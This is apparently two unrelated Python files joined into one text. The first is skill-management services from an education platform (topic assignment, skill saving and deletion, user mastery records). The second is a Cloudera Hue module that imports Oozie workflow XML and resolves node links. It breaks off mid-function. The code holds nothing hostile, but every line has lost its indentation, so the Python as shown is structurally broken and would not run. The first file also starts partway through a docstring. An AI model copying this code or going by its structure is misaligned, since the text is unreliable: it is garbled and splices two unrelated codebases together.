skill: Skill. The skill itself.
Returns:
list(str). List containing the name of the image files in skill.
"""
html_list = skill.get_all_html_content_strings()
return html_cleaner.get_image_filenames_from_html_strings(html_list)
def get_all_topic_assignments_for_skill(skill_id):
"""Returns a list containing all the topics to which the given skill is
assigned along with topic details.
Args:
skill_id: str. ID of the skill.
Returns:
list(TopicAssignment). A list of TopicAssignment domain objects.
"""
topic_assignments = []
topics = topic_fetchers.get_all_topics()
for topic in topics:
if skill_id in topic.get_all_skill_ids():
subtopic_id = None
for subtopic in topic.subtopics:
if skill_id in subtopic.skill_ids:
subtopic_id = subtopic.id
break
topic_assignments.append(skill_domain.TopicAssignment(
topic.id, topic.name, topic.version, subtopic_id))
return topic_assignments
def replace_skill_id_in_all_topics(user_id, old_skill_id, new_skill_id):
"""Replaces the old skill id with the new one in all the associated topics.
Args:
user_id: str. The unique user ID of the user.
old_skill_id: str. The old skill id.
new_skill_id: str. The new skill id.
"""
all_topics = topic_fetchers.get_all_topics()
for topic in all_topics:
change_list = []
if old_skill_id in topic.get_all_skill_ids():
if new_skill_id in topic.get_all_skill_ids():
raise Exception(
                    'The topic \'%s\' contains both skills to be merged. '
                    'Please unassign one of these skills from the topic '
                    'and retry this operation.' % topic.name)
if old_skill_id in topic.uncategorized_skill_ids:
change_list.extend([topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': old_skill_id
}), topic_domain.TopicChange({
'cmd': 'add_uncategorized_skill_id',
'new_uncategorized_skill_id': new_skill_id
})])
for subtopic in topic.subtopics:
if old_skill_id in subtopic.skill_ids:
change_list.extend([topic_domain.TopicChange({
'cmd': topic_domain.CMD_REMOVE_SKILL_ID_FROM_SUBTOPIC,
'subtopic_id': subtopic.id,
'skill_id': old_skill_id
}), topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': old_skill_id
}), topic_domain.TopicChange({
'cmd': 'add_uncategorized_skill_id',
'new_uncategorized_skill_id': new_skill_id
}), topic_domain.TopicChange({
'cmd': topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC,
'old_subtopic_id': None,
'new_subtopic_id': subtopic.id,
'skill_id': new_skill_id
})])
break
topic_services.update_topic_and_subtopic_pages(
user_id, topic.id, change_list,
'Replace skill id %s with skill id %s in the topic' % (
old_skill_id, new_skill_id))
def remove_skill_from_all_topics(user_id, skill_id):
"""Deletes the skill with the given id from all the associated topics.
Args:
user_id: str. The unique user ID of the user.
skill_id: str. ID of the skill.
"""
all_topics = topic_fetchers.get_all_topics()
for topic in all_topics:
change_list = []
if skill_id in topic.get_all_skill_ids():
for subtopic in topic.subtopics:
if skill_id in subtopic.skill_ids:
change_list.append(topic_domain.TopicChange({
'cmd': 'remove_skill_id_from_subtopic',
'subtopic_id': subtopic.id,
'skill_id': skill_id
}))
break
change_list.append(topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': skill_id
}))
skill_name = get_skill_summary_by_id(skill_id).description
topic_services.update_topic_and_subtopic_pages(
user_id, topic.id, change_list,
'Removed skill with id %s and name %s from the topic' % (
skill_id, skill_name))
def get_skill_summary_by_id(skill_id, strict=True):
"""Returns a domain object representing a skill summary.
Args:
skill_id: str. ID of the skill summary.
strict: bool. Whether to fail noisily if no skill summary with the given
id exists in the datastore.
Returns:
SkillSummary. The skill summary domain object corresponding to a skill
with the given skill_id.
"""
skill_summary_model = skill_models.SkillSummaryModel.get(
skill_id, strict=strict)
if skill_summary_model:
skill_summary = get_skill_summary_from_model(
skill_summary_model)
return skill_summary
else:
return None
def get_new_skill_id():
"""Returns a new skill id.
Returns:
str. A new skill id.
"""
return skill_models.SkillModel.get_new_id('')
def _create_skill(committer_id, skill, commit_message, commit_cmds):
"""Creates a new skill.
Args:
committer_id: str. ID of the committer.
skill: Skill. The skill domain object.
commit_message: str. A description of changes made to the skill.
commit_cmds: list(SkillChange). A list of change commands made to the
given skill.
"""
skill.validate()
model = skill_models.SkillModel(
id=skill.id,
description=skill.description,
language_code=skill.language_code,
misconceptions=[
misconception.to_dict()
for misconception in skill.misconceptions
],
rubrics=[
rubric.to_dict()
for rubric in skill.rubrics
],
skill_contents=skill.skill_contents.to_dict(),
next_misconception_id=skill.next_misconception_id,
misconceptions_schema_version=skill.misconceptions_schema_version,
rubric_schema_version=skill.rubric_schema_version,
skill_contents_schema_version=skill.skill_contents_schema_version,
superseding_skill_id=skill.superseding_skill_id,
all_questions_merged=skill.all_questions_merged,
prerequisite_skill_ids=skill.prerequisite_skill_ids
)
commit_cmd_dicts = [commit_cmd.to_dict() for commit_cmd in commit_cmds]
model.commit(committer_id, commit_message, commit_cmd_dicts)
skill.version += 1
create_skill_summary(skill.id)
opportunity_services.create_skill_opportunity(
skill.id,
skill.description)
def does_skill_with_description_exist(description):
"""Checks if skill with provided description exists.
Args:
description: str. The description for the skill.
Returns:
        bool. Whether a skill with the given description exists.
"""
existing_skill = (
skill_fetchers.get_skill_by_description(description))
return existing_skill is not None
def save_new_skill(committer_id, skill):
"""Saves a new skill.
Args:
committer_id: str. ID of the committer.
skill: Skill. Skill to be saved.
"""
commit_message = 'New skill created.'
_create_skill(
committer_id, skill, commit_message, [skill_domain.SkillChange({
'cmd': skill_domain.CMD_CREATE_NEW
})])
def apply_change_list(skill_id, change_list, committer_id):
"""Applies a changelist to a skill and returns the result.
Args:
skill_id: str. ID of the given skill.
change_list: list(SkillChange). A change list to be applied to the given
skill.
committer_id: str. The ID of the committer of this change list.
Returns:
Skill. The resulting skill domain object.
"""
skill = skill_fetchers.get_skill_by_id(skill_id)
user = user_services.get_user_actions_info(committer_id)
try:
for change in change_list:
if change.cmd == skill_domain.CMD_UPDATE_SKILL_PROPERTY:
if (change.property_name ==
skill_domain.SKILL_PROPERTY_DESCRIPTION):
if role_services.ACTION_EDIT_SKILL_DESCRIPTION not in (
user.actions):
raise Exception(
'The user does not have enough rights to edit the '
'skill description.')
skill.update_description(change.new_value)
(
opportunity_services
.update_skill_opportunity_skill_description(
skill.id, change.new_value))
elif (change.property_name ==
skill_domain.SKILL_PROPERTY_LANGUAGE_CODE):
skill.update_language_code(change.new_value)
elif (change.property_name ==
skill_domain.SKILL_PROPERTY_SUPERSEDING_SKILL_ID):
skill.update_superseding_skill_id(change.new_value)
elif (change.property_name ==
skill_domain.SKILL_PROPERTY_ALL_QUESTIONS_MERGED):
skill.record_that_all_questions_are_merged(change.new_value)
elif change.cmd == skill_domain.CMD_UPDATE_SKILL_CONTENTS_PROPERTY:
if (change.property_name ==
skill_domain.SKILL_CONTENTS_PROPERTY_EXPLANATION):
explanation = (
state_domain.SubtitledHtml.from_dict(change.new_value))
explanation.validate()
skill.update_explanation(explanation)
elif (change.property_name ==
skill_domain.SKILL_CONTENTS_PROPERTY_WORKED_EXAMPLES):
worked_examples_list = [
skill_domain.WorkedExample.from_dict(worked_example)
for worked_example in change.new_value]
skill.update_worked_examples(worked_examples_list)
elif change.cmd == skill_domain.CMD_ADD_SKILL_MISCONCEPTION:
misconception = skill_domain.Misconception.from_dict(
change.new_misconception_dict)
skill.add_misconception(misconception)
elif change.cmd == skill_domain.CMD_DELETE_SKILL_MISCONCEPTION:
skill.delete_misconception(change.misconception_id)
elif change.cmd == skill_domain.CMD_ADD_PREREQUISITE_SKILL:
skill.add_prerequisite_skill(change.skill_id)
elif change.cmd == skill_domain.CMD_DELETE_PREREQUISITE_SKILL:
skill.delete_prerequisite_skill(change.skill_id)
elif change.cmd == skill_domain.CMD_UPDATE_RUBRICS:
skill.update_rubric(
change.difficulty, change.explanations)
elif (change.cmd ==
skill_domain.CMD_UPDATE_SKILL_MISCONCEPTIONS_PROPERTY):
if (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_NAME):
skill.update_misconception_name(
change.misconception_id, change.new_value)
elif (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_NOTES):
skill.update_misconception_notes(
change.misconception_id, change.new_value)
elif (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_FEEDBACK):
skill.update_misconception_feedback(
change.misconception_id, change.new_value)
elif (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_MUST_BE_ADDRESSED): # pylint: disable=line-too-long
skill.update_misconception_must_be_addressed(
change.misconception_id, change.new_value)
else:
raise Exception('Invalid change dict.')
elif (change.cmd in (
skill_domain.CMD_MIGRATE_CONTENTS_SCHEMA_TO_LATEST_VERSION,
skill_domain.CMD_MIGRATE_MISCONCEPTIONS_SCHEMA_TO_LATEST_VERSION, # pylint: disable=line-too-long
skill_domain.CMD_MIGRATE_RUBRICS_SCHEMA_TO_LATEST_VERSION
)):
# Loading the skill model from the datastore into a
# skill domain object automatically converts it to use the
# latest schema version. As a result, simply resaving the
# skill is sufficient to apply the schema migration.
continue
return skill
except Exception as e:
logging.error(
'%s %s %s %s' % (
e.__class__.__name__, e, skill_id, change_list)
)
raise e
def populate_skill_model_fields(skill_model, skill):
"""Populate skill model with the data from skill object.
Args:
skill_model: SkillModel. The model to populate.
skill: Skill. The skill domain object which should be used to
populate the model.
Returns:
SkillModel. Populated model.
"""
skill_model.description = skill.description
skill_model.language_code = skill.language_code
skill_model.superseding_skill_id = skill.superseding_skill_id
skill_model.all_questions_merged = skill.all_questions_merged
skill_model.prerequisite_skill_ids = skill.prerequisite_skill_ids
skill_model.misconceptions_schema_version = (
skill.misconceptions_schema_version)
skill_model.rubric_schema_version = (
skill.rubric_schema_version)
skill_model.skill_contents_schema_version = (
skill.skill_contents_schema_version)
skill_model.skill_contents = skill.skill_contents.to_dict()
skill_model.misconceptions = [
misconception.to_dict() for misconception in skill.misconceptions
]
skill_model.rubrics = [
rubric.to_dict() for rubric in skill.rubrics
]
skill_model.next_misconception_id = skill.next_misconception_id
return skill_model
def _save_skill(committer_id, skill, commit_message, change_list):
"""Validates a skill and commits it to persistent storage. If
successful, increments the version number of the incoming skill domain
object by 1.
Args:
committer_id: str. ID of the given committer.
skill: Skill. The skill domain object to be saved.
commit_message: str. The commit message.
change_list: list(SkillChange). List of changes applied to a skill.
Raises:
Exception. The skill model and the incoming skill domain object have
different version numbers.
Exception. Received invalid change list.
"""
if not change_list:
raise Exception(
'Unexpected error: received an invalid change list when trying to '
'save skill %s: %s' % (skill.id, change_list))
skill.validate()
# Skill model cannot be None as skill is passed as parameter here and that
# is only possible if a skill model with that skill id exists.
skill_model = skill_models.SkillModel.get(
skill.id, strict=False)
if skill.version > skill_model.version:
raise Exception(
'Unexpected error: trying to update version %s of skill '
'from version %s. Please reload the page and try again.'
% (skill_model.version, skill.version))
if skill.version < skill_model.version:
raise Exception(
'Trying to update version %s of skill from version %s, '
'which is too old. Please reload the page and try again.'
% (skill_model.version, skill.version))
skill_model = populate_skill_model_fields(skill_model, skill)
change_dicts = [change.to_dict() for change in change_list]
skill_model.commit(committer_id, commit_message, change_dicts)
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_SKILL, None, [skill.id])
skill.version += 1
def update_skill(committer_id, skill_id, change_list, commit_message):
"""Updates a skill. Commits changes.
Args:
committer_id: str. The id of the user who is performing the update
action.
skill_id: str. The skill id.
change_list: list(SkillChange). These changes are applied in sequence to
produce the resulting skill.
commit_message: str or None. A description of changes made to the
skill. For published skills, this must be present; for
unpublished skills, it may be equal to None.
Raises:
ValueError. No commit message was provided.
"""
if not commit_message:
raise ValueError(
'Expected a commit message, received none.')
skill = apply_change_list(skill_id, change_list, committer_id)
_save_skill(committer_id, skill, commit_message, change_list)
create_skill_summary(skill.id)
misconception_is_deleted = any(
change.cmd == skill_domain.CMD_DELETE_SKILL_MISCONCEPTION
for change in change_list
)
if misconception_is_deleted:
deleted_skill_misconception_ids = [
skill.generate_skill_misconception_id(change.misconception_id)
for change in change_list
if change.cmd == skill_domain.CMD_DELETE_SKILL_MISCONCEPTION
]
taskqueue_services.defer(
taskqueue_services.FUNCTION_ID_UNTAG_DELETED_MISCONCEPTIONS,
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS,
committer_id, skill_id, skill.description,
deleted_skill_misconception_ids)
def delete_skill(committer_id, skill_id, force_deletion=False):
"""Deletes the skill with the given skill_id.
Args:
committer_id: str. ID of the committer.
skill_id: str. ID of the skill to be deleted.
force_deletion: bool. If true, the skill and its history are fully
deleted and are unrecoverable. Otherwise, the skill and all
its history are marked as deleted, but the corresponding models are
still retained in the datastore. This last option is the preferred
one.
"""
skill_models.SkillModel.delete_multi(
[skill_id], committer_id, '', force_deletion=force_deletion)
# This must come after the skill is retrieved. Otherwise the memcache
# key will be reinstated.
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_SKILL, None, [skill_id])
# Delete the summary of the skill (regardless of whether
# force_deletion is True or not).
delete_skill_summary(skill_id)
opportunity_services.delete_skill_opportunity(skill_id)
suggestion_services.auto_reject_question_suggestions_for_skill_id(
skill_id)
def delete_skill_summary(skill_id):
"""Delete a skill summary model.
Args:
skill_id: str. ID of the skill whose skill summary is to
be deleted.
"""
skill_summary_model = (
skill_models.SkillSummaryModel.get(skill_id, False))
if skill_summary_model is not None:
skill_summary_model.delete()
def compute_summary_of_skill(skill):
"""Create a SkillSummary domain object for a given Skill domain
object and return it.
Args:
skill: Skill. The skill object, for which the summary is to be computed.
Returns:
SkillSummary. The computed summary for the given skill.
"""
skill_model_misconception_count = len(skill.misconceptions)
skill_model_worked_examples_count = len(
skill.skill_contents.worked_examples)
skill_summary = skill_domain.SkillSummary(
skill.id, skill.description, skill.language_code,
skill.version, skill_model_misconception_count,
skill_model_worked_examples_count,
skill.created_on, skill.last_updated
)
return skill_summary
def create_skill_summary(skill_id):
"""Creates and stores a summary of the given skill.
Args:
skill_id: str. ID of the skill.
"""
skill = skill_fetchers.get_skill_by_id(skill_id)
skill_summary = compute_summary_of_skill(skill)
save_skill_summary(skill_summary)
def populate_skill_summary_model_fields(skill_summary_model, skill_summary):
"""Populate skill summary model with the data from skill summary object.
Args:
skill_summary_model: SkillSummaryModel. The model to populate.
skill_summary: SkillSummary. The skill summary domain object which
should be used to populate the model.
Returns:
SkillSummaryModel. Populated model.
"""
skill_summary_dict = {
'description': skill_summary.description,
'language_code': skill_summary.language_code,
'version': skill_summary.version,
'misconception_count': skill_summary.misconception_count,
'worked_examples_count': skill_summary.worked_examples_count,
'skill_model_last_updated': skill_summary.skill_model_last_updated,
'skill_model_created_on': skill_summary.skill_model_created_on
}
if skill_summary_model is not None:
skill_summary_model.populate(**skill_summary_dict)
else:
skill_summary_dict['id'] = skill_summary.id
skill_summary_model = skill_models.SkillSummaryModel(
**skill_summary_dict)
return skill_summary_model
def save_skill_summary(skill_summary):
"""Save a skill summary domain object as a SkillSummaryModel
entity in the datastore.
Args:
skill_summary: SkillSummaryModel. The skill summary object to be saved
in the datastore.
"""
existing_skill_summary_model = (
skill_models.SkillSummaryModel.get_by_id(skill_summary.id))
skill_summary_model = populate_skill_summary_model_fields(
existing_skill_summary_model, skill_summary
)
skill_summary_model.update_timestamps()
skill_summary_model.put()
def create_user_skill_mastery(user_id, skill_id, degree_of_mastery):
"""Creates skill mastery of a user.
Args:
user_id: str. The user ID of the user for whom to create the model.
skill_id: str. The unique id of the skill.
degree_of_mastery: float. The degree of mastery of user in the skill.
"""
user_skill_mastery = skill_domain.UserSkillMastery(
user_id, skill_id, degree_of_mastery)
save_user_skill_mastery(user_skill_mastery)
def save_user_skill_mastery(user_skill_mastery):
"""Stores skill mastery of a user.
Args:
user_skill_mastery: dict. The user skill mastery model of a user.
"""
user_skill_mastery_model = user_models.UserSkillMasteryModel(
id=user_models.UserSkillMasteryModel.construct_model_id(
user_skill_mastery.user_id, user_skill_mastery.skill_id),
user_id=user_skill_mastery.user_id,
skill_id=user_skill_mastery.skill_id,
degree_of_mastery=user_skill_mastery.degree_of_mastery)
user_skill_mastery_model.update_timestamps()
user_skill_mastery_model.put()
def create_multi_user_skill_mastery(user_id, degrees_of_mastery):
"""Creates the mastery of a user in multiple skills.
Args:
user_id: str. The user ID of the user.
degrees_of_mastery: dict(str, float). The keys are the requested
skill IDs. The values are the corresponding mastery degree of
the user.
"""
user_skill_mastery_models = []
for skill_id, degree_of_mastery in degrees_of_mastery.items():
user_skill_mastery_models.append(user_models.UserSkillMasteryModel(
id=user_models.UserSkillMasteryModel.construct_model_id(
user_id, skill_id),
user_id=user_id, skill_id=skill_id,
degree_of_mastery=degree_of_mastery))
user_models.UserSkillMasteryModel.update_timestamps_multi(
user_skill_mastery_models)
user_models.UserSkillMasteryModel.put_multi(user_skill_mastery_models)
def get_user_skill_mastery(user_id, skill_id):
"""Fetches the mastery of user in a particular skill.
Args:
user_id: str. The user ID of the user.
skill_id: str. Unique id of the skill for which mastery degree is
requested.
Returns:
float or None. Mastery degree of the user for the requested skill, or
None if UserSkillMasteryModel does not exist for the skill.
"""
model_id = user_models.UserSkillMasteryModel.construct_model_id(
user_id, skill_id)
user_skill_mastery_model = user_models.UserSkillMasteryModel.get(
model_id, strict=False)
if not user_skill_mastery_model:
return None
return user_skill_mastery_model.degree_of_mastery
def get_multi_user_skill_mastery(user_id, skill_ids):
"""Fetches the mastery of user in multiple skills.
Args:
user_id: str. The user ID of the user.
skill_ids: list(str). Skill IDs of the skill for which mastery degree is
requested.
Returns:
dict(str, float|None). The keys are the requested skill IDs. The values
are the corresponding mastery degree of the user or None if
UserSkillMasteryModel does not exist for the skill.
"""
degrees_of_mastery = {}
model_ids = []
for skill_id in skill_ids:
model_ids.append(user_models.UserSkillMasteryModel.construct_model_id(
user_id, skill_id))
skill_mastery_models = user_models.UserSkillMasteryModel.get_multi(
model_ids)
for skill_id, skill_mastery_model in zip(skill_ids, skill_mastery_models):
if skill_mastery_model is None:
degrees_of_mastery[skill_id] = None
else:
degrees_of_mastery[skill_id] = skill_mastery_model.degree_of_mastery
return degrees_of_mastery
def skill_has_associated_questions(skill_id):
"""Returns whether or not any question has this skill attached.
Args:
skill_id: str. The skill ID of the user.
Returns:
bool. Whether any question has this skill attached.
"""
question_ids = (
question_models.QuestionSkillLinkModel.get_all_question_ids_linked_to_skill_id( # pylint: disable=line-too-long
skill_id))
return len(question_ids) > 0
def get_sorted_skill_ids(degrees_of_mastery):
"""Sort the dict based on the mastery value.
Args:
degrees_of_mastery: dict(str, float|None). Dict mapping
skill ids to mastery level. The mastery level can be
float or None.
Returns:
        list(str). At most feconf.MAX_NUMBER_OF_SKILL_IDS skill ids, sorted by
        ascending mastery level with unrecorded (None) masteries first.
"""
skill_dict_with_float_value = {
skill_id: degree for skill_id, degree in degrees_of_mastery.items()
if degree is not None}
sorted_skill_ids_with_float_value = sorted(
skill_dict_with_float_value, key=skill_dict_with_float_value.get)
skill_ids_with_none_value = [
skill_id for skill_id, degree in degrees_of_mastery.items()
if degree is None]
sorted_skill_ids = (
skill_ids_with_none_value + sorted_skill_ids_with_float_value)
return sorted_skill_ids[:feconf.MAX_NUMBER_OF_SKILL_IDS]
def filter_skills_by_mastery(user_id, skill_ids):
"""Given a list of skill_ids, it returns a list of
feconf.MAX_NUMBER_OF_SKILL_IDS skill_ids in which the user has
the least mastery.(Please note that python 2.7 considers the None
type smaller than any value, so None types will be returned first)
Args:
user_id: str. The unique user ID of the user.
skill_ids: list(str). The skill_ids that are to be filtered.
Returns:
list(str). A list of the filtered skill_ids.
"""
degrees_of_mastery = get_multi_user_skill_mastery(user_id, skill_ids)
filtered_skill_ids = get_sorted_skill_ids(degrees_of_mastery)
    # Arrange the skill_ids in the order in which they were received.
arranged_filtered_skill_ids = []
for skill_id in skill_ids:
if skill_id in filtered_skill_ids:
arranged_filtered_skill_ids.append(skill_id)
return arranged_filtered_skill_ids
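# A minimal illustration of the re-ordering above (hypothetical IDs): if
# skill_ids is ['s1', 's2', 's3'] and the mastery-based filter keeps only
# {'s3', 's1'}, the function returns ['s1', 's3'], i.e. the surviving IDs in
# the order in which they were originally received.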
|
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Import an external workflow by providing an XML definition.
The workflow definition is imported via the method 'import_workflow'.
The XML is first transformed into a Django-serialized string that can be deserialized and interpreted.
The interpreted objects are then assigned to the workflow, stripped of any useless IDs and saved.
Then the links are interpreted from the original XML definition.
First the basic links are interpreted for basic hierarchy traversal.
Then the related links are inferred, including Decision node ends.
See oozie.models.Decision for more information on decision ends.
The XSLTs are partitioned by version.
For every new workflow DTD version a new directory should be created.
IE: uri:oozie:workflow:0.4 => 0.4 directory in xslt dir.
Action extensions are also versioned.
Every action extension will have its own version via /xslt/<workflow version>/extensions/<name of extensions>.<version>.xslt
"""
try:
import json
except ImportError:
import simplejson as json
import logging
from lxml import etree
from django.core import serializers
from django.utils.encoding import smart_str
from django.utils.translation import ugettext as _
from conf import DEFINITION_XSLT_DIR
from models import Workflow, Node, Link, Start, End,\
Decision, DecisionEnd, Fork, Join,\
Kill
from utils import xml_tag
LOG = logging.getLogger(__name__)
OOZIE_NAMESPACES = ['uri:oozie:workflow:0.1', 'uri:oozie:workflow:0.2', 'uri:oozie:workflow:0.3', 'uri:oozie:workflow:0.4']
LINKS = ('ok', 'error', 'path')
def _save_links(workflow, root):
"""
Iterates over all links in the passed XML doc and creates links.
First non-META links are resolved and created, then META links.
Link name is chosen with the following logic:
If node is start, then use 'to'.
Else If node is Join, then use 'to'.
Else If node is Decision, then
If tag is 'default', then use 'default'
Else use 'start'
Else
If tag is 'path', use 'start'
Else use tag as name ('ok' or 'error')
This strategy has the following resolution:
- Fork and Decision nodes have Links named 'start'.
- Decision nodes have a 'default' link.
  - Decision nodes may have a 'related' link that is their end.
  - Fork nodes always have a 'related' node that is their end join node.
- Start and Join nodes have links named 'to'.
- All action nodes have 'ok' and 'error' links.
Note: The nodes that these links point to should exist already.
Note: Nodes are looked up by workflow and name.
  Note: Skip global configuration explicitly. Unknown nodes should throw an error.
"""
LOG.debug("Start resolving links for workflow %s" % smart_str(workflow.name))
# Iterate over nodes
for child_el in root:
# Skip special nodes (like comments).
if not isinstance(child_el.tag, basestring):
continue
# Skip kill nodes.
if child_el.tag.endswith('kill'):
continue
# Skip global configuration.
if child_el.tag.endswith('global'):
continue
tag = xml_tag(child_el)
name = child_el.attrib.get('name', tag)
LOG.debug("Getting node with data - XML TAG: %(tag)s\tLINK NAME: %(node_name)s\tWORKFLOW NAME: %(workflow_name)s" % {
'tag': smart_str(tag),
'node_name': smart_str(name),
'workflow_name': smart_str(workflow.name)
})
# Iterate over node members
# Join nodes have attributes which point to the next node
# Start node has attribute which points to first node
try:
parent = Node.objects.get(name=name, workflow=workflow).get_full_node()
except Node.DoesNotExist, e:
raise RuntimeError(_('Node with name %s for workflow %s does not exist.') % (name, workflow.name))
if isinstance(parent, Start):
_start_relationships(workflow, parent, child_el)
elif isinstance(parent, Join):
_join_relationships(workflow, parent, child_el)
elif isinstance(parent, Decision):
_decision_relationships(workflow, parent, child_el)
else:
_node_relationships(workflow, parent, child_el)
workflow.end = End.objects.get(workflow=workflow).get_full_node()
workflow.save()
_resolve_start_relationships(workflow)
_resolve_fork_relationships(workflow)
_resolve_decision_relationships(workflow)
LOG.debug("Finished resolving links for workflow %s" % smart_str(workflow.name))
def _start_relationships(workflow, parent, child_el):
"""
Resolve start node links.
Will always use 'to' link type.
"""
if 'to' not in child_el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
workflow.start = parent
to = child_el.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError(_("Node %s has not been defined.") % to)
obj = Link.objects.create(name='to', parent=parent, child=child)
obj.save()
def _join_relationships(workflow, parent, child_el):
"""
Resolves join node links.
Will always use 'to' link type.
"""
if 'to' not in child_el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
to = child_el.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError(_("Node %s has not been defined.") % to)
obj = Link.objects.create(name='to', parent=parent, child=child)
obj.save()
def _decision_relationships(workflow, parent, child_el):
"""
  Resolves the switch-statement-like nature of decision nodes.
  Will use the 'start' link type, except for the default case, which uses 'default'.
"""
for switch in child_el:
# Skip special nodes (like comments).
if not isinstance(switch.tag, basestring):
continue
for case in switch:
# Skip special nodes (like comments).
if not isinstance(case.tag, basestring):
continue
if 'to' not in case.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
to = case.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError(_("Node %s has not been defined.") % to)
if xml_tag(case) == 'default':
name = 'default'
obj = Link.objects.create(name=name, parent=parent, child=child)
else:
name = 'start'
comment = case.text.strip()
obj = Link.objects.create(name=name, parent=parent, child=child, comment=comment)
obj.save()
def _node_relationships(workflow, parent, child_el):
"""
Resolves node links.
  Will use the 'start' link type for fork paths and the tag name ('ok' or 'error') for all other nodes.
Error links will automatically resolve to a single kill node.
"""
for el in child_el:
# Skip special nodes (like comments).
if not isinstance(el.tag, basestring):
continue
# Links
name = xml_tag(el)
if name in LINKS:
if name == 'path':
if 'start' not in el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'start' attribute.") % parent.name)
to = el.attrib['start']
name = 'start'
elif name == 'error':
to = 'kill'
else:
if 'to' not in el.attrib:
raise RuntimeError(_("Node %s has a link that is missing 'to' attribute.") % parent.name)
to = el.attrib['to']
try:
child = Node.objects.get(workflow=workflow, name=to)
except Node.DoesNotExist, e:
raise RuntimeError("Node %s has not been defined" % to)
obj = Link.objects.create(name=name, parent=parent, child=child)
obj.save()
def _resolve_start_relationships(workflow):
if not workflow.start:
raise RuntimeError(_("Workflow start has not been created."))
if not workflow.end:
raise RuntimeError(_("Workflow end has not been created."))
obj = Link.objects.get_or_create(name='related', parent=workflow.start, child=workflow.end)
def _resolve_fork_relationships(workflow):
"""
Requires proper workflow structure.
Fork must come before a join.
"""
def helper(workflow, node, last_fork):
if isinstance(node, Fork):
join = None
children = node.get_children()
for child in children:
join = helper(workflow, child.get_full_node(), node) or join
link = Link(name='related', parent=node, child=join)
link.save()
node = join
elif isinstance(node, Join):
return node
join = None
children = node.get_children()
for child in children:
join = helper(workflow, child.get_full_node(), last_fork) or join
return join
helper(workflow, workflow.start.get_full_node(), None)
def _resolve_decision_relationships(workflow):
"""
Requires proper workflow structure.
  Decision must come before any random ends.
DecisionEnd nodes are added to the end of the decision DAG.
  Decision DAG ends are inferred by counting the parents of nodes that are not joins.
A 'related' link is created to associate the DecisionEnd to the Decision.
IE: D
D N
N N
N
equals
D
D N
N N
E
E
N
Performs a depth first search to understand branching.
"""
def insert_end(node, decision):
"""Insert DecisionEnd between node and node parents"""
parent_links = node.get_parent_links().exclude(name='default')
decision_end = decision.get_child_end()
# Find parent decision node for every end's parent.
# If the decision node is the one passed,
# change the parent to link to the Decision node's DecisionEnd node.
# Skip embedded decisions and forks along the way.
decision_end_used = False
for parent_link in parent_links:
parent = parent_link.parent.get_full_node()
node_temp = parent
while node_temp and not isinstance(node_temp, Decision):
if isinstance(node_temp, Join):
node_temp = node_temp.get_parent_fork().get_parent()
elif isinstance(node_temp, DecisionEnd):
node_temp = node_temp.get_parent_decision().get_parent()
else:
node_temp = node_temp.get_parent()
if node_temp.id == decision.id and parent.node_type != Decision.node_type:
links = Link.objects.filter(parent=parent).exclude(name__in=['related', 'kill', 'error'])
if len(links) != 1:
raise RuntimeError(_('Cannot import workflows that have decision DAG leaf nodes with multiple children or no children.'))
link = links[0]
link.child = decision_end
link.save()
decision_end_used = True
# Create link between DecisionEnd and terminal node.
if decision_end_used and not Link.objects.filter(name='to', parent=decision_end, child=node).exists():
link = Link(name='to', parent=decision_end, child=node)
link.save()
def decision_helper(decision):
"""
Iterates through children, waits for ends.
When an end is found, finish the decision.
If the end has more parents than the decision has branches, bubble the end upwards.
"""
# Create decision end if it does not exist.
if not Link.objects.filter(parent=decision, name='related').exists():
end = DecisionEnd(workflow=workflow, node_type=DecisionEnd.node_type)
end.save()
link = Link(name='related', parent=decision, child=end)
link.save()
children = [link.child.get_full_node() for link in decision.get_children_links().exclude(name__in=['error','default'])]
ends = set()
for child in children:
end = helper(child)
if end:
ends.add(end)
# A single end means that we've found a unique end for this decision.
# Multiple ends mean that we've found a bad decision.
if len(ends) > 1:
raise RuntimeError(_('Cannot import workflows that have decisions paths with multiple terminal nodes that converge on a single terminal node.'))
elif len(ends) == 1:
end = ends.pop()
# Branch count will vary with each call if we have multiple decision nodes embedded within decision paths.
# This is because parents are replaced with DecisionEnd nodes.
fan_in_count = len(end.get_parent_links().exclude(name__in=['error','default']))
# IF it covers all branches, then it is an end that perfectly matches this decision.
# ELSE it is an end for a decision path that the current decision node is a part of as well.
# The unhandled case is multiple ends for a single decision that converge on a single end.
# This is not handled in Hue.
fan_out_count = len(decision.get_children_links().exclude(name__in=['error','default']))
if fan_in_count > fan_out_count:
insert_end(end, decision)
return end
elif fan_in_count == fan_out_count:
insert_end(end, decision)
# End node is a decision node.
# This means that there are multiple decision nodes in sequence.
# If both decision nodes are within a single decision path,
# then the end may need to be returned, if found.
if isinstance(end, Decision):
